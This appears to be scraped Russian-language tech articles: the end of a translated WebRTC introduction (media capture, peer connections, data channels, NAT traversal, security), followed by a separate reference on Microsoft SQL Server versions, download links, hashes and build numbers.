```
function gotStream(stream) {
window.AudioContext = window.AudioContext || window.webkitAudioContext;
var audioContext = new AudioContext();
// Создать AudioNode из потока
var mediaStreamSource = audioContext.createMediaStreamSource(stream);
// Подключить его к целевому объекту для того, чтобы слышать самого себя,
// или к любому другому узлу для обработки!
mediaStreamSource.connect(audioContext.destination);
}
navigator.getUserMedia({audio:true}, gotStream);
```
Ограничения, связанные с защитой личной информации
--------------------------------------------------
Несанкционированный захват данных с микрофона или камеры — это серьёзное вмешательство в личную жизнь пользователя. Поэтому использование `getUserMedia()` предусматривает реализацию весьма специфических требований по оповещению пользователя о происходящем и по управлению разрешениями. Метод `getUserMedia()` всегда должен получать разрешение пользователя перед открытием любого устройства ввода, собирающего медиаданные, такого, как веб-камера или микрофон. Браузеры могут предлагать возможность однократной установки разрешения для домена, но они обязаны запросить разрешение, как минимум, при первой попытке обращения к медиа-устройствам, и пользователь должен явно дать подобное разрешение.
Кроме того, тут важны правила, связанные с уведомлением пользователя о происходящем. Браузеры обязаны отображать индикатор, который указывает на использование микрофона или камеры. Отображение подобного индикатора не зависит от наличия в системе аппаратных индикаторов, указывающих на работу подобных устройств. Кроме того, браузеры должны показывать индикатор того, что на использование устройства ввода дано разрешение, даже если устройство в некий момент времени не используется для записи соответствующих данных.
Интерфейс RTCPeerConnection
---------------------------
Интерфейс RTCPeerConnection представляет собой WebRTC-соединение между локальным компьютером и удалённым пиром. Он предоставляет методы для подключения к удалённой системе, для поддержки соединения и мониторинга его состояния, и для закрытия соединения после того, как оно больше не нужно.
Вот диаграмма архитектуры WebRTC, демонстрирующая роль RTCPeerConnection.

*Роль RTCPeerConnection*
С точки зрения JavaScript, главное знание, которое можно извлечь из анализа этой диаграммы, заключается в том, что RTCPeerConnection абстрагирует веб-разработчика от сложных механизмов, расположенных на более глубоких уровнях системы. Кодеки и протоколы, используемые WebRTC, выполняют огромную работу для того, чтобы сделать возможным обмен данными в реальном времени, причём, даже при использовании ненадёжных сетей. Вот некоторые из задач, решаемые этими механизмами:
* Маскирование потери пакетов.
* Подавление эхо.
* Адаптация полосы пропускания.
* Динамическая буферизация для устранения «дрожания».
* Автоматический контроль уровня громкости.
* Уменьшение и подавление шума.
* «Очистка» изображения.
API RTCDataChannel
------------------
Так же, как в случае с аудио- и видео-данными, WebRTC поддерживает передачу в реальном времени других типов данных. API RTCDataChannel позволяет организовать P2P-обмен произвольными данными.
Существует множество сценариев использования этого API. Вот некоторые из них:
* Игры.
* Текстовые чаты реального времени.
* Передача файлов.
* Организация децентрализованных сетей.
Это API ориентировано на максимально эффективное использование возможностей API RTCPeerConnection и позволяет организовать мощную и гибкую систему обмена данными в P2P-среде. Среди его возможностей можно отметить следующие:
* Эффективная работа с сессиями с применением RTCPeerConnection.
* Поддержка множества одновременно используемых каналов связи с приоритизацией.
* Поддержка надёжных и ненадёжных методов доставки сообщений.
* Встроенные средства управления безопасностью (DTLS) и перегрузками.
Синтаксис тут похож на тот, который используется при работе с технологией WebSocket. Здесь применяется метод `send()` и событие `message`:
```
var peerConnection = new webkitRTCPeerConnection(servers,
{optional: [{RtpDataChannels: true}]}
);
peerConnection.ondatachannel = function(event) {
receiveChannel = event.channel;
receiveChannel.onmessage = function(event){
document.querySelector("#receiver").innerHTML = event.data;
};
};
sendChannel = peerConnection.createDataChannel("sendDataChannel", {reliable: false});
document.querySelector("button#send").onclick = function (){
var data = document.querySelector("textarea#send").value;
sendChannel.send(data);
}
```
WebRTC в реальном мире
----------------------
В реальном мире для организации WebRTC-коммуникации нужны сервера. Системы это не слишком сложные, благодаря им реализуется выполнение следующей последовательности действий:
* Пользователи обнаруживают друг друга и обмениваются сведениями друг о друге, например, именами.
* Клиентские WebRTC-приложения (пиры) обмениваются сетевой информацией.
* Пиры обмениваются сведениями о медиа-данных, такими, как формат и разрешение видео.
* Клиентские WebRTC-приложения устанавливают соединение, обходя [NAT-шлюзы](http://en.wikipedia.org/wiki/NAT_traversal) и файрволы.
Другими словами, WebRTC нуждается в четырёх типах серверных функций:
* Средства для обнаружения пользователей и организации их взаимодействия.
* Сигналирование.
* Обход NAT и файрволов.
* Серверы-ретрансляторы, используемые в тех случаях когда не удаётся установить P2P-соединение.
Протокол [STUN](http://en.wikipedia.org/wiki/STUN) и его расширение [TURN](http://en.wikipedia.org/wiki/Traversal_Using_Relay_NAT) используются [ICE](http://en.wikipedia.org/wiki/Interactive_Connectivity_Establishment) для того, чтобы позволить RTCPeerConnection работать с механизмами обхода NAT и справляться с другими сложностями, возникающими при передаче данных по сети.
Как уже было сказано, ICE — это протокол для соединения пиров, таких, как два клиента видеочата. В самом начале сеанса связи ICE пытается соединить пиров напрямую, с наименьшей возможной задержкой, через UDP. В ходе этого процесса у STUN-серверов имеется единственная задача: позволить пиру, находящемуся за NAT, узнать свой публичный адрес и порт. Взгляните на [этот список](https://gist.github.com/zziuni/3741933) доступных STUN-серверов (такие серверы есть и у Google).

*STUN-серверы*
Обнаружение ICE-кандидатов
--------------------------
Если UDP-подключение установить не удаётся, ICE пробует установить TCP-соединение: сначала — по HTTP, потом — по HTTPS. Если прямое соединение установить не получается — в частности из-за невозможности обхода корпоративных NAT и файрволов, ICE использует посредника (ретранслятор) в виде TURN-сервера. Другими словами, ICE сначала попытается использовать STUN с UDP для прямого соединения пиров, и, если это не получится, воспользуется запасным вариантом с рентанслятором в виде TURN-сервера. Выражение «поиск кандидатов» относится к процессу поиска сетевых интерфейсов и портов.

*Поиск подходящих сетевых интерфейсов и портов*
Безопасность
------------
Приложения для организации связи в реальном времени или соответствующие плагины могут привести к проблемам с безопасностью. В частности, речь идёт о следующем:
* Незашифрованные медиа-данные или другие данные могут быть перехвачены по пути между браузерами, или между браузером и сервером.
* Приложение может, без ведома пользователя, записывать и передавать злоумышленнику видео- и аудио-данные.
* Вместе с безобидно выглядящим плагином или приложением на компьютер пользователя может попасть вирус или другое вредоносное ПО.
В WebRTC имеются несколько механизмов, предназначенных для борьбы с этими угрозами:
* Реализации WebRTC используют безопасные протоколы вроде [DTLS](http://en.wikipedia.org/wiki/Datagram_Transport_Layer_Security) и [SRTP](http://en.wikipedia.org/wiki/Secure_Real-time_Transport_Protocol).
* Для всех компонентов WebRTC-систем обязательно использование шифрования. Это относится и к механизмам сигналирования.
* WebRTC — это не плагин. Компоненты WebRTC выполняются в песочнице браузера, а не в отдельном процессе. Компоненты обновляются при обновлении браузера.
* Доступ к камере и микрофону должен даваться в явном виде. И, когда камера или микрофон используются, этот факт чётко отображается в пользовательском интерфейсе браузера.
Итоги
-----
WebRTC — это весьма интересная и мощная технология для проектов, в рамках которых используется передача каких-либо данных между браузерами в реальном времени. Автор материала говорит, что в его компании, [SessionStack](https://www.sessionstack.com/), используют традиционные механизмы обмена данными с пользователями, предусматривающие применение серверов. Однако, если бы они использовали WebRTC для решения соответствующих задач, это позволило бы организовывать обмен данными напрямую между браузерами, что привело бы к уменьшению задержки при передачи данных и к сокращению нагрузки на инфраструктуру компании.
**Уважаемые читатели!** Пользуетесь ли вы технологией WebRTC в своих проектах?
[](https://ruvds.com/ru-rub/#order) | https://habr.com/ru/post/416821/ | null | ru | null |
# Разнообразие версий Microsoft SQL Server и какая из них последняя?
В свое время из-за немного громоздкой политики по выпуску обновлений для Microsoft SQL Server путался какой же из дистриубтивов нужно установить и откуда его скачать. Углубившись в данную тематику, в интернете нашел замечательные систематизирующие ресусры, которые отвечали на мои вопросы (они приведены в начале статьи).
Надеюсь собранная информация будет полезна не только мне.
Github версия в формате markdown на английском языке: <https://github.com/ktaranov/sqlserver-kit/blob/master/SQL%20Server%20Version.md>
Также, вас возможно заинтересуют другие статьи о Microsoft SQL Server:
* [Полный список инструментов и утилит для Microsoft SQL Server](https://habrahabr.ru/post/303724/) (175 утилит и инструментов)
* [Полный список флагов трассировки Microsoft SQL Server](https://habrahabr.ru/post/303212/) (362 флага трассировки на текущий момент)
* [Разнообразие версий Microsoft SQL Server и какая из них последняя?](https://habrahabr.ru/post/281194/) (все версии от SQL Server 6.0 до V.Next)
* [Полный список расширений для SQL Server Management Studio (SSMS)](https://habrahabr.ru/post/304036/) (29 аддонов на текущий момент)
* [Список полезных ресурсов по Microsoft SQL Server](https://habrahabr.ru/post/305866/) (более 200 полезных ресурсов)
* [10 причин почему именно сейчас стоит попробовать Microsoft SQL Server](https://habrahabr.ru/post/316064/)
Заголовки:
* [Часто используемые термины и акронимы](#chasto-ispolzuemye-terminy-i-sokrascheniya)
* [Какие самые последние обновления доступны для SQL Server?](#kakie-samye-poslednie-obnovleniya-dostupny-dlya-sql-server)
* [Установочные файлы Microsoft SQL Server с прямыми ссылками на загрузку](#ustanovochnye-fayly-microsoft-sql-server-s-pryamymi-ssylkami-na-zagruzku)
* [Версии SQL Server и уровни совместимости](#versii-sql-server-i-urovni-sovmestimosti)
* [Общая информация по Service Pack](#obschaya-informaciya-po-service-pack)
* [Microsoft SQL Server VNext Builds](#microsoft-sql-server-vnext-builds)
* [Microsoft SQL Server 2016 Builds](#microsoft-sql-server-2016-builds)
* [Microsoft SQL Server 2014 Builds](#microsoft-sql-server-2014-builds)
* [Microsoft SQL Server 2012 Builds](#microsoft-sql-server-2012-builds)
* [Microsoft SQL Server 2008 R2 Builds](#microsoft-sql-server-2008-r2-builds)
* [Microsoft SQL Server 2008 Builds](#microsoft-sql-server-2008-builds)
* [Microsoft SQL Server 2005 Builds](#microsoft-sql-server-2005-builds)
* [Microsoft SQL Server 2000 Builds](#microsoft-sql-server-2000-builds)
* [Microsoft SQL Server 7.0 Builds](#microsoft-sql-server-70-builds)
* [Microsoft SQL Server 6.5 Builds](#microsoft-sql-server-65-builds)
* [Microsoft SQL Server 6.0 Builds](#microsoft-sql-server-60-builds)
Полезные ссылки и статьи
------------------------
* **Невероятная по объему и полезности статья** — How to determine the version, edition and update level of SQL Server and its components: [KB321185](https://support.microsoft.com/en-us/kb/321185)
* Наименование схем обновления для Microsoft SQL Server: [KB822499](https://support.microsoft.com/en-us/kb/822499)
* Стандартная терминология, которая используется для описания обновлений ПО от Microsoft: [KB824684](https://support.microsoft.com/en-us/kb/824684)
* SQL Server Updates от Brent Ozar с возможность подписки: <http://sqlserverupdates.com/>
* SQL Server Builds от SQLSentry: <http://blogs.sqlsentry.com/category/sql-server-builds/>
* Неофициальный список обновлений для Microsoft SQL Server: <http://sqlserverbuilds.blogspot.ru/>
* Wikipedia: <https://en.wikipedia.org/wiki/Microsoft_SQL_Server>
* SQL Server 2005 Downloads: <https://msdn.microsoft.com/en-us/sqlserver/bb671254.aspx>
* SQL Server 2000 Downloads: <https://msdn.microsoft.com/en-us/sqlserver/bb895925>
* SQL Server 7.0 Downloads: <https://msdn.microsoft.com/en-us/sqlserver/bb671066>
Часто используемые термины и сокращения
---------------------------------------
**COD** *Critical On-Demand* (критическое обновление по требованию)
* **CU** *Cumulative Update* (накопительное обновление)
* **CTP** *Community Technology Preview* (CTP-версия)
* **GA** *General Availability* (общедоступная версия
* **GDR** *General Distribution Release* (обновление GDR)
* **QFE** *Quick Fix Engineering* (обновление QFE) (в мире Windows, это называется LDR — Limited Release Distribution — но этот термин не прижился в команде SQL Server).
* **RC** *Release Candidate* (версия-кандидат)
* **RDP** *Rapid Deployment Program*
* **RTM** *Released To Manufacturing*
* **RTW** *Release to Web*
* **TAP** *Technology Adoption Program*
* **SP** *Service Pack*
* **SU**: Обновление безопасности.
* **Hotfix**
Обычно процедура установки SQL Server выглядит следующим образом:
1. Устанавливается нужная вам стабильная версия (на текущий момент рекомендуемые это 2014 или 2016)
2. Затем устанавливается последний из доступных сервис паков
3. Устанавливается последний накопительный пакет обнволений для устранения различного рода багов
4. В случае необходимости для устранения конкретных проблем устанавливается нужный Hotfix
Какие самые последние обновления доступны для SQL Server?
---------------------------------------------------------
| Версия | Последние обновления | Номер сборки | Дата релиза | Начало цикла | Поддержка | Расширенная поддержка | Другие обновления |
| --- | --- | --- | --- | --- | --- | --- | --- |
| vNext | [Install vNext](https://www.microsoft.com/en-us/sql-server/sql-server-vnext-including-Linux#resources) | 14.0.200.24 | 2017-01-20 | ? | ? | ? | [Other SQL vNext Updates](#microsoft-sql-server-vnext-builds) |
| 2016 | [Install 2016 SP1](https://go.microsoft.com/fwlink/?LinkID=799011) then
[SP1 CU1 KB3208177](https://support.microsoft.com/en-us/help/3208177/cumulative-update-1-for-sql-server-2016-sp1) | 13.0.4001.0
13.0.4199.0 | 2016-11-16
2017-01-18 | 2016-11-16 | 2021-07-13 | 2026-07-14 | [Other SQL 2016 Updates](#microsoft-sql-server-2016-builds) |
| 2014 | [Install 2014 SP2](https://www.microsoft.com/en-us/evalcenter/evaluate-sql-server-2014-sp2) Or [Developer Free](https://www.microsoft.com/en-us/cloud-platform/sql-server-editions-developers) then
[KB3204388](https://support.microsoft.com/en-us/kb/3204388) | 12.0.5000.0
12.0.5538.0 | 2016-07-11
2016-12-28 | 2016-07-14 | 2019-07-09 | 2024-07-09 | [Other SQL 2014 Updates](#microsoft-sql-server-2014-builds) |
| 2012 | [Install 2012](https://www.microsoft.com/en-us/evalcenter/evaluate-sql-server-2012) Or [Developer Free](https://www.microsoft.com/en-us/cloud-platform/sql-server-editions-developers) then
[SP3 2012](http://www.microsoft.com/en-us/download/details.aspx?id=49996) then
[KB3205051](https://support.microsoft.com/en-us/help/3205051/cumulative-update-7-for-sql-server-2012-sp3) | 11.0.2100.60
11.0.6020.0
11.0.6579.0 | 2012-02-14
2015-11-21
2017-01-18 | 2015-12-01 | 2017-07-11 | 2022-07-12 | [Other SQL 2012 Updates](#microsoft-sql-server-2012-builds) |
| 2008 R2 | [Install 2008 R2](https://www.microsoft.com/en-us/download/details.aspx?id=11093) then
[SP3 2008 R2](http://www.microsoft.com/en-us/download/details.aspx?id=44271) then
[SU KB3045311](https://www.microsoft.com/downloads/details.aspx?familyid=7af16cb8-c944-41cb-a897-c6fc373869cd) | 6.1.7601.17514
10.50.6000
10.50.6220.0 | 2010-11-21
2014-09-30
2015-07-14 | Review Note | 2014-07-08 | 2019-07-09 | [Other SQL 2008 R2 Updates](#microsoft-sql-server-2008-r2-builds) |
| 2008 | [Install 2008](https://www.microsoft.com/en-us/download/details.aspx?id=5023) then
[SP4 2008](http://www.microsoft.com/en-us/download/details.aspx?id=44278) then
[SU KB3045316](https://support.microsoft.com/en-us/kb/3045311) | 6.0.6001.18000
10.00.6000
10.0.6241.0 | 2008-01-19
2014-09-30
2015-07-14 | 2014-07-07 | 2014-07-08 | 2019-07-09 | [Other SQL 2008 Updates](#microsoft-sql-server-2008-builds) |
| 2005 | [Install SP4 2005](http://www.microsoft.com/downloads/en/details.aspx?FamilyID=b953e84f-9307-405e-bceb-47bd345baece) then
[CU3 KB2507769](http://support.microsoft.com/kb/2507769) | 9.00.5000.00
9.00.5266 | 2010-12-17
2011-03-17 | 2010-12-13 | 2011-04-12 | 2016-04-12 | [Other SQL 2005 Updates](#microsoft-sql-server-2005-builds) |
Установочные файлы Microsoft SQL Server с прямыми ссылками на загрузку
----------------------------------------------------------------------
SHA1 хэш можно легко получить с помощью встроенной Windows утилиты [certutil](https://technet.microsoft.com/en-us/library/cc732443.aspx).
Например, для одного файла:
```
certUtil -hashfile "d:\SQL Server\SQLServer2014SP1-KB3058865-x64-ENU.exe" sha1
```
Или для всех файлов в директории, имеющих расширение **.exe**:
```
FOR /R "d:\YaDsik\Backup\Distrib\SQL Server" %I IN (*.exe) DO certUtil -hashfile "%I" sha1
```
| Direct x64 Download Link | File Name | Release Date | Build Number | Size, MB | SHA1 |
| --- | --- | --- | --- | --- | --- |
| [SQL Server vNext](http://care.dlservice.microsoft.com/dl/download/A/9/F/A9F911CC-A0D3-4F35-9D80-4F5C7F6886D1/ENU/SQLServerVnextCTP1-x64-ENU.iso) | SQLServerVnextCTP1-x64-ENU.iso | 2017-01-20 | 14.0.200.24 | 1975 | 9a 29 ce b3 96 6e fe cb 08 fa 69 af 7c 99 7b dd 4b 68 32 41 |
| [SQL Server 2016](http://care.dlservice.microsoft.com/dl/download/F/E/9/FE9397FA-BFAB-4ADD-8B97-91234BC774B2/SQLServer2016-x64-ENU.iso) | SQLServer2016-x64-ENU.iso | 2016-06-01 | 13.0.1601.5 | 2050 | ce 21 bf 1c 08 ec 1a c4 8e bb 49 88 a8 60 2c 78 13 03 4e a3 |
| [SQL Server 2016 SP1](https://download.microsoft.com/download/3/0/D/30D3ECDD-AC0B-45B5-B8B9-C90E228BD3E5/ENU/SQLServer2016SP1-KB3182545-x64-ENU.exe) | SQLServer2016SP1-KB3182545-x64-ENU.exe | 2016-11-16 | 13.0.4001.0 | 552 | 8c 6c f1 88 78 93 1d 8e fd 44 b9 52 e7 94 20 00 2b 8a 48 85 |
| [SQL Server 2016 SP1 KB3208177](https://download.microsoft.com/download/D/3/3/D33543E3-770F-4053-AE0F-A883696668FF/SQL16SP1CU1/x64/SQLServer2016-KB3208177-x64.exe) | SQLServer2016-KB3208177-x64.exe | 2017-01-18 | 13.0.4411.0 | 439 | fb d9 69 dd b8 34 07 77 ff ad 7a 39 b5 d3 27 d2 5a 10 a7 43 |
| [SQL Server 2014 SP2](http://care.dlservice.microsoft.com/dl/download/6/D/9/6D90C751-6FA3-4A78-A78E-D11E1C254700/SQLServer2014SP2-FullSlipstream-x64-ENU.iso) | SQLServer2014SP2-FullSlipstream-x64-ENU.iso | 2016-07-11 | 12.0.5000.0 | 3010 | 16 f1 93 4d c1 f4 79 94 cd 92 44 39 f8 84 a0 5c 6a d4 d1 73 |
| [SQL Server 2014 SP2 KB3204388](https://download.microsoft.com/download/5/E/E/5EEAC4AB-1635-44B9-BFBD-4A1405EB5EC8/SQL14SP2CU3/x64/SQLServer2014-KB3204388-x64.exe) | SQLServer2014-KB3204388-x64.exe | 2016-12-28 | 12.0.5538.0 | 555 | 6f 76 bf 1a 04 58 6e e9 b7 a9 1c 77 98 23 90 4c 13 00 b7 bc |
| [SQL Server 2012](https://download.microsoft.com/download/4/C/7/4C7D40B9-BCF8-4F8A-9E76-06E9B92FE5AE/ENU/SQLFULL_ENU.iso) | SQLFULL\_ENU.iso | 2012-02-14 | 11.0.2100.60 | 4300 | be 00 94 2c c5 6d 03 3e 2c 9d ce 8a 17 a6 f2 65 4f 51 84 a3 |
| [SQL Server 2012 SP3](https://download.microsoft.com/download/B/1/7/B17F8608-FA44-462D-A43B-00F94591540A/ENU/x64/SQLServer2012SP3-KB3072779-x64-ENU.exe) | SQLServer2012SP3-KB3072779-x64-ENU.exe | 2015-11-21 | 11.0.6020.0 | 1017 | db f0 1b 6d c6 d6 0c 2b 04 5c 92 d9 18 62 e6 08 7a d7 2a 0a |
| [SQL Server 2012 SP3 KB3205051] | SQLServer2012-KB3205051-x64.exe | 2017-01-18 | 11.0.6579.0 | 614 | 43 46 74 9c 43 90 b4 5b 6e d2 34 fc 95 23 d3 e5 91 46 ce 6b |
| [SQL Server 2008 R2](https://download.microsoft.com/download/7/5/E/75EC4E54-5B02-42D6-8879-D8D3A25FBEF7/7601.17514.101119-1850_x64fre_server_eval_en-us-GRMSXEVAL_EN_DVD.iso) | 7601.17514.101119-1850\_x64fre\_server\_eval\_en-us-GRMSXEVAL\_EN\_DVD.iso | 2010-11-21 | 6.1.7601.17514 | 3020 | e1 f1 12 e3 b0 b3 03 a0 67 6f 70 dc 35 85 4b d7 6c d2 54 50 |
| [SQL Server 2008 R2 SP3](https://download.microsoft.com/download/D/7/A/D7A28B6C-FCFE-4F70-A902-B109388E01E9/ENU/SQLServer2008R2SP3-KB2979597-x64-ENU.exe) | SQLServer2008R2SP3-KB2979597-x64-ENU.exe | 2014-09-30 | 10.50.6220.0 | 358 | 19 4c d7 40 d5 81 2b 12 63 9b 47 88 6e bd e0 d0 47 74 b4 ec |
| [SQL Server 2008 R2 SU](https://download.microsoft.com/download/4/D/A/4DAE6F9E-960E-4A59-BDE7-1D92DA508315/SQLServer2008R2-KB3045316-x64.exe) | SQLServer2008R2-KB3045316-x64.exe | 2015-07-14 | 10.50.6000 | 58 | 3a a4 d8 20 55 3b 1e 5d 96 73 55 41 cb b5 5d 97 32 2c 28 6e |
| [SQL Server 2008](https://download.microsoft.com/download/D/D/B/DDB17DC1-A879-44DD-BD11-C0991D292AD7/6001.18000.080118-1840_amd64fre_Server_en-us-KRMSXFRE_EN_DVD.exe) | 6001.18000.080118-1840\_amd64fre\_Server\_en-us-KRMSXFRE\_EN\_DVD.exe | 2008-01-19 | 6.0.6001.18000 | 2269 | e4 d6 29 00 0f c2 3d a9 f9 e0 77 4b 79 69 80 ff 7f 71 f7 48 |
| [SQL Server 2008 SP4](https://download.microsoft.com/download/5/E/7/5E7A89F7-C013-4090-901E-1A0F86B6A94C/ENU/SQLServer2008SP4-KB2979596-x64-ENU.exe) | SQLServer2008SP4-KB2979596-x64-ENU.exe | 2014-09-30 | 10.0.6241.0 | 378 | 13 61 0d 6c b3 9e 37 fc d4 a3 33 82 44 a3 ca 2a 8a 40 4c d8 |
| [SQL Server 2008 SU](https://download.microsoft.com/download/E/C/0/EC0A7C15-9A6D-4F41-9B9F-BCA10CC3937C/SQLServer2008-KB3045311-x64.exe) | SQLServer2008-KB3045311-x64.exe | 2015-07-14 | 10.00.6000 | 61 | 37 a1 97 c6 09 90 d2 e8 3e 98 d1 09 01 09 a4 ab 3f 2a be 4b |
Версии SQL Server и уровни совместимости
----------------------------------------
| Версия SQL Server | Версия ядра | Кодовое имя | Год релиза | Внутренняя версия | Уровень совместимости | Поддерживаемые уровни совместимости |
| --- | --- | --- | --- | --- | --- | --- |
| SQL Server vNext | 14 | vNext | 2017 | 856 | 140 | 140, 130, 120, 110, 100 |
| SQL Server 2016 | 13 | SQL16 | 2016 | 841 | 130 | 130, 120, 110, 100 |
| Azure SQL Database | 12 | CloudDB | 2010 (2017) | 841 | 130 | 130, 120, 110, 100 |
| SQL Server 2014 | 12 | SQL14 | 2014 | 782 | 120 | 120, 110, 100 |
| SQL Server 2012 | 11 | Denali | 2012 | 706 | 110 | 110, 100, 90 |
| SQL Server 2012 CTP1 | 11 | Denali | 2010 | 684 | 110 | 110, 100, 90 |
| SQL Server 2008 R2 | 10.5 | Kilimanjaro | 2010 | 660 / 661 | 100 | 100, 90, 80 |
| SQL Server 2008 | 10 | Katmai | 2008 | 655 | 100 | 100, 90, 80 |
| SQL Server 2005 SP2+ with VarDecimal enabled | 9 | Yukon | 2005 | 612 | 90 | 90, 80 |
| SQL Server 2005 | 9 | Yukon | 2005 | 611 | 90 | 90, 80 |
| SQL Server 2000 | 8 | Shiloh | 2000 | 539 | 80 | 80 |
| SQL Server 7.0 | ? | Sphinx | 1998 | 515 | 70 | 70 |
| SQL Server 6.5 | ? | Hydra | 1996 | 408 | 65 | 65 |
| SQL Server 6.0 | ? | SQL95 | 1995 | ? | 60 | ? |
| SQL Server 4.21 | ? | SQLNT | 1993 | ? | 60 | ? |
| SQL Server 1.1 (16 bit) | ? | ? | 1991 | ? | 60 | ? |
| SQL Server 1.0 (16 bit) | ? | Ashton-Tate | 1989 | ? | 60 | ? |
Общая информация по Service Pack
--------------------------------
| Version | Codename | RTM (no SP) | SP1 | SP2 | SP3 | SP4 |
| --- | --- | --- | --- | --- | --- | --- |
| SQL Server vNext | vNext | [14.0.200.24](https://www.microsoft.com/en-us/sql-server/sql-server-vnext-including-Linux#resources) | | | | |
| SQL Server 2016 | SQL16 | [13.0.1601.5](https://www.microsoft.com/en-in/evalcenter/evaluate-sql-server-2016) | [13.0.4001.0](https://support.microsoft.com/en-us/kb/3182545) | | | |
| SQL Server 2014 | SQL14 | 12.0.2000.8 | [12.0.4100.1](http://www.microsoft.com/en-us/download/details.aspx?id=46694) | [12.0.5000.0](https://support.microsoft.com/en-us/kb/3171021) | | |
| SQL Server 2012 | Denali | 11.0.2100.60 | [11.0.3000.0](http://www.microsoft.com/en-us/download/details.aspx?id=35575) | [11.0.5058.0](http://www.microsoft.com/en-us/download/details.aspx?id=43340) | [11.0.6020.0](http://www.microsoft.com/en-us/download/details.aspx?id=49996) | |
| SQL Server 2008 R2 | Kilimanjaro | 10.50.1600.1 | [10.50.2500.0](http://www.microsoft.com/en-us/download/details.aspx?id=26727) | [10.50.4000.0](http://www.microsoft.com/en-us/download/details.aspx?id=30437)
10.52.4000.0 | [10.50.6000.34](http://www.microsoft.com/en-us/download/details.aspx?id=44271)
10.53.6000.34 | |
| SQL Server 2008 | Katmai | 10.0.1600.22 | [10.0.2531.0](http://www.microsoft.com/downloads/details.aspx?familyid=66AB3DBB-BF3E-4F46-9559-CCC6A4F9DC19) | [10.0.4000.0](http://www.microsoft.com/downloads/en/details.aspx?FamilyID=8FBFC1DE-D25E-4790-88B5-7DDA1F1D4E17)
10.2.4000.0 | [10.0.5500.0](http://www.microsoft.com/download/en/details.aspx?id=27594)
10.3.5500.0 | [10.0.6000.29](http://www.microsoft.com/en-us/download/details.aspx?id=44278)
10.4.6000.29 |
| SQL Server 2005 | Yukon | 9.0.1399.06 | [9.0.2047](http://www.microsoft.com/downloads/details.aspx?FamilyID=CB6C71EA-D649-47FF-9176-E7CAC58FD4BC) | [9.0.3042](http://www.microsoft.com/downloads/details.aspx?FamilyId=d07219b2-1e23-49c8-8f0c-63fa18f26d3a) | [9.0.4035](http://www.microsoft.com/downloads/details.aspx?FamilyId=ae7387c3-348c-4faa-8ae5-949fdfbe59c4) | [9.0.5000](http://www.microsoft.com/downloads/details.aspx?FamilyId=b953e84f-9307-405e-bceb-47bd345baece) |
| SQL Server 2000 | Shiloh | 8.0.194 | [8.0.384](http://www.microsoft.com/downloads/details.aspx?FamilyID=DFF43C50-51DF-4FE0-9717-DE41FB48556E) | [8.0.532](http://www.microsoft.com/downloads/details.aspx?FamilyID=75672496-af8e-40dc-853e-ad2c9fe96882) | [8.0.760](http://www.microsoft.com/downloads/details.aspx?familyid=90DCD52C-0488-4E46-AFBF-ACACE5369FA3) | [8.0.2039](http://www.microsoft.com/downloads/details.aspx?FamilyId=8E2DFC8D-C20E-4446-99A9-B7F0213F8BC5) |
| SQL Server 7.0 | Sphinx | 7.0.623 | 7.0.699 | 7.0.842 | 7.0.961 | [7.0.1063](https://www.microsoft.com/en-us/download/details.aspx?id=7959) |
Microsoft SQL Server VNext Builds
---------------------------------
Так выглядит результат выполнения запроса `SELECT @@VERSION` для актуальной версии SQL Server vNext Developer Edition:
```
Microsoft SQL Server vNext (CTP1.2) - 14.0.200.24 (X64)
Jan 10 2017 19:15:28
Copyright (c) Microsoft Corporation. All rights reserved.
Developer Edition (64-bit) on Windows …
```
Последние обновления и фиксы: [What's New in SQL Server vNext](https://msdn.microsoft.com/en-us/library/mt775028.aspx)
Версия для Linux: [What's new for SQL Server vNext on Linux](https://docs.microsoft.com/en-us/sql/linux/sql-server-linux-whats-new)
Полезные статьи по V.Next:
* [How I spot not-yet-documented features in SQL Server CTPs](https://blogs.sentryone.com/aaronbertrand/fishing-for-features-in-ctps/)
* [More ways to discover changes in new versions of SQL Server](https://blogs.sentryone.com/aaronbertrand/more-changes-sql-server/)
| Билд | Версия файла | Ветка | Тип | KB / Описание | Дата релиза | Дата билда | Размер, Мб |
| --- | --- | --- | --- | --- | --- | --- | --- |
| 14.0.200.24 | 2016.140.200.24 | CTP | CTP | [Microsoft SQL Server vNext Community Technology Preview 1.2 (CTP1.2)](https://www.microsoft.com/en-us/evalcenter/evaluate-sql-server-vnext-ctp) | 2017-01-18 | 2017-01-11 | 1975 |
| 14.0.100.187 | 2016.140.100.187 | CTP | CTP | Microsoft SQL Server vNext Community Technology Preview 1.1 (CTP1.1) | 2016-12-16 | 2016-12-11 | 1975 |
| 14.0.1.246 | 2016.140.1.246 | CTP | CTP | Microsoft SQL Server vNext Community Technology Preview 1 (CTP1) | 2016-11-16 | 2016-11-02 | 1983 |
Microsoft SQL Server 2016 Builds
--------------------------------
Так выглядит результат выполнения запроса `SELECT @@VERSION` для актуальной версии SQL Server 2016 Developer Edition:
```
Microsoft SQL Server 2016 (SP1-CU1) (KB3208177) – 13.0.4411.0 (X64)
Jan 6 2017 14:24:37
Copyright (c) Microsoft Corporation
Developer Edition (64-bit) on Windows …
```
| Билд | Версия файла | Ветка | Тип | KB / Описание | Дата релиза | Дата билда | Размер, Мб |
| --- | --- | --- | --- | --- | --- | --- | --- |
| 13.0.4411.0 | 2015.130.4411.0 | SP1 | CU | [3208177 Cumulative update 1 for SQL Server 2016 Service Pack 1](https://support.microsoft.com/en-us/help/3208177/cumulative-update-1-for-sql-server-2016-sp1) | 2017-01-18 | 2017-01-06 | 439 |
| 13.0.4202.0 | 2015.130.4202.0 | SP1 | COD | [3210089 GDR update package for SQL Server 2016 SP1](https://support.microsoft.com/en-us/kb/3210089) | 2016-12-16 | 2016-12-13 | |
| 13.0.4199.0 | 2015.130.4199.0 | SP1 | COD | [3207512 Important update for SQL Server 2016 SP1 Reporting Services](https://support.microsoft.com/en-us/kb/3207512) | 2016-11-23 | 2016-11-18 | |
| 13.0.4001.0 | 2015.130.4001.0 | SP1 | SP | [3182545 SQL Server 2016 Service Pack 1 release information](https://support.microsoft.com/en-us/kb/3182545) | 2016-11-16 | 2016-10-29 | |
| 13.0.2193.0 | 2015.130.2193.0 | RTM | CU | [3205052 Cumulative update 4 for SQL Server 2016](https://support.microsoft.com/en-us/help/3205052/cumulative-update-4-for-sql-server-2016) | 2017-01-18 | 2017-01-06 | 699 |
| 13.0.2190.2 | 2015.130.2190.2 | RTM | COD | [3210110 On-demand hotfix update package for SQL Server 2016 CU3](https://support.microsoft.com/en-us/kb/3210110) | 2016-12-16 | 2016-12-13 | |
